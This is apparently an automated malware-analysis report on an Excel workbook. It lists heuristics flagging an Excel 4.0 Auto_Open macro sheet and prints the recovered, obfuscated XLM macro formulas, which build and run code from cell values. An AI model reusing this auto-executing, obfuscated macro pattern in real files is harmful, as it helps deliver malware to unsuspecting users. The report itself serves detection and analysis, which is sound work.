MALICIOUS
Risk Score: 140
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6427 bytes |

SHA-256: 16ea3e87d0f43be1a65586ea34f1fa398c2823632fb1723d48e64552d4500396
Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - wtn
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F131
' 0018 25 LABEL : Cell Value, String Constant - CmrvZrVNFr len=0
' 0018 26 LABEL : Cell Value, String Constant - dLToYovglYq len=0
' 0018 26 LABEL : Cell Value, String Constant - EpRUzoSdtht len=0
' 0018 22 LABEL : Cell Value, String Constant - eWcyTDi len=0
' 0018 24 LABEL : Cell Value, String Constant - FyxYBbroO len=0
' 0018 22 LABEL : Cell Value, String Constant - HjnNJKO len=0
' 0018 27 LABEL : Cell Value, String Constant - HPtVtMRThlJh len=0
' 0018 22 LABEL : Cell Value, String Constant - iMYSixR len=0
' 0018 25 LABEL : Cell Value, String Constant - KQmiBEodXA len=0
' 0018 20 LABEL : Cell Value, String Constant - krsQI len=0
' 0018 25 LABEL : Cell Value, String Constant - LhUFYfLyhA len=0
' 0018 26 LABEL : Cell Value, String Constant - mZjDHWpbchJ len=0
' 0018 23 LABEL : Cell Value, String Constant - NkdaGVBE len=0
' 0018 27 LABEL : Cell Value, String Constant - pbgxPTrhgmvl len=0
' 0018 20 LABEL : Cell Value, String Constant - RhdeE len=0
' 0018 23 LABEL : Cell Value, String Constant - SWYAoCCE len=0
' 0018 21 LABEL : Cell Value, String Constant - tWRfkf len=0
' 0018 21 LABEL : Cell Value, String Constant - ufzQpc len=0
' 0018 24 LABEL : Cell Value, String Constant - yTbSQoCWn len=0
' 0018 22 LABEL : Cell Value, String Constant - zmCWcrT len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' wtn,F42,"SET.NAME("mZjDHWpbchJ",VALUE("0"))",""
' wtn,F45,"SET.NAME("HjnNJKO",mZjDHWpbchJ)",""
' wtn,F50,"SET.NAME("RhdeE",mZjDHWpbchJ)",""
' wtn,F55,"SET.NAME("LhUFYfLyhA",COUNTA(HPtVtMRThlJh))",""
' wtn,F58,"SET.NAME("tWRfkf",COUNTA(yTbSQoCWn))",""
' wtn,F63,[],""
' wtn,F68,"SET.NAME("ufzQpc","")",""
' wtn,F71,"HjnNJKO",""
' wtn,F75,"SET.NAME("krsQI",HLOOKUP("*",HPtVtMRThlJh,HjnNJKO,FALSE))",""
' wtn,F77,"KQmiBEodXA",""
' wtn,F79,"SET.NAME("SWYAoCCE",mZjDHWpbchJ)",""
' wtn,F82,[],""
' wtn,F84,"SWYAoCCE",""
' wtn,F88,"EpRUzoSdtht",""
' wtn,F93,"CmrvZrVNFr",""
' wtn,F98,"zmCWcrT",""
' wtn,F102,"SET.NAME("pbgxPTrhgmvl",VALUE(HLOOKUP("*",yTbSQoCWn,zmCWcrT,FALSE)))",""
' wtn,F104,"FyxYBbroO",""
' wtn,F107,"ufzQpc",""
' wtn,F109,"RhdeE",""
' wtn,F112,NEXT(),""
' wtn,F114,"iMYSixR",""
' wtn,F116,"SET.NAME("f",INT(T(FORMULA(T(ufzQpc)&"",""&T(iMYSixR)))))",""
' wtn,F118,"eWcyTDi",""
' wtn,F122,NEXT(),""
' wtn,F127,RETURN(),""
' wtn,F160,"SET.NAME("dLToYovglYq",F42)",""
' wtn,F164,"HPtVtMRThlJh",""
' wtn,F166,"SET.NAME("yTbSQoCWn",R74C13)",""
' wtn,F168,"SET.NAME("eWcyTDi",177)",""
' wtn,F171,"SET.NAME("NkdaGVBE",6)",""
' wtn,F176,dLToYovglYq(),""
' wtn,F177,HALT(),""